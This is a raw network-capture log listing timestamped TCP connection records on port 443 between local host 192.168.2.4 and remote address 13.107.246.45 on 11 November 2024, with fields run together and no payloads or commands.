                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.448946953 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449004889 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449239969 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449254990 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449660063 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449680090 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449728012 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449740887 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449780941 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449831009 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449929953 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449929953 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449940920 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.449949980 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.451751947 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.451775074 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.451848030 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.451957941 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.451976061 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452075958 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452085972 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452086926 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452097893 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452151060 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452260017 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452270985 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452274084 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.452286005 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.960999966 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.961666107 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.961699963 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.962337017 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.962343931 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965050936 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965447903 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965470076 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965878963 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965884924 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.965935946 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966171026 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966240883 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966259003 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966420889 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966439009 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966799021 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966803074 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966826916 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.966831923 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.976102114 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.976475954 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.976497889 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.976844072 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:57.976849079 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054308891 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054429054 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054492950 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054714918 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054735899 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054748058 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.054758072 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057512999 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057677031 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057727098 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057754993 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057771921 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057784081 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.057790041 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.058315992 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.058355093 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.058413029 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.058650017 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.058665037 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.059154987 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.059235096 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060127974 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060141087 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060153961 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060204983 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060220957 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060237885 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060262918 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060303926 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060303926 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060312033 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060317039 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060319901 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060322046 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060332060 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060338974 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060934067 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.060944080 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.062859058 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.062899113 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.062916994 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.062923908 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.062973022 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.063004971 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.063118935 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.063127041 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.063148022 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.063165903 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.069760084 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070120096 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070180893 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070215940 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070234060 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070246935 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.070251942 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.072372913 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.072407007 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.072469950 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.072633028 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.072649956 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.576426983 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.576539993 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.576579094 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577112913 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577112913 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577132940 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577156067 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577733994 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577733994 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577739000 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577748060 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.577984095 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.578003883 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.578357935 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.578363895 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.583805084 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.584094048 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.584106922 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.584451914 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.584455967 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.669759035 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.669802904 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670034885 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670155048 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670165062 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670176029 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670181036 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670506954 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670692921 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670746088 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670794964 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670808077 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670821905 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670840025 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670846939 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.670994997 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.671035051 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.671720982 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.671725035 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.671736002 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.671739101 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.673686981 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.673708916 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.673774958 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674146891 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674179077 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674226046 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674321890 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674334049 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674354076 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674360991 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674411058 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674467087 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674483061 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674527884 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.674535990 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.676888943 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677002907 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677047014 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677076101 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677081108 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677092075 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.677094936 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.679034948 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.679044008 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.679121017 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.679255009 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:58.679269075 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.189393997 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190073013 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190094948 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190704107 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190709114 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190768957 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.190987110 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191229105 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191262960 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191297054 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191304922 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191703081 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191710949 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191768885 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.191775084 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283305883 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283366919 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283423901 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283670902 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283673048 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283694983 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283709049 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283714056 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283936977 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283947945 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.283989906 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284004927 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284040928 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284070969 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284099102 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284113884 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284121037 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284208059 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284213066 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284224033 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.284226894 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287528038 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287570953 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287589073 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287623882 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287646055 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287672043 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287802935 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287815094 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287893057 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.287904024 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.288156986 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.288168907 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.288234949 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.288378954 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.288386106 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.395720959 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.396238089 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.396265984 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.396764040 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.396771908 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488451958 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488553047 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488627911 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488866091 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488888025 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488898993 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.488903999 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.492897987 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.492939949 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.493022919 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.493222952 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.493237972 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.801310062 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.801832914 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802011967 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802025080 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802067041 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802174091 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802201986 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802711964 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802714109 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802716017 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:59.802720070 CET4434978513.107.246.45192.168.2.4
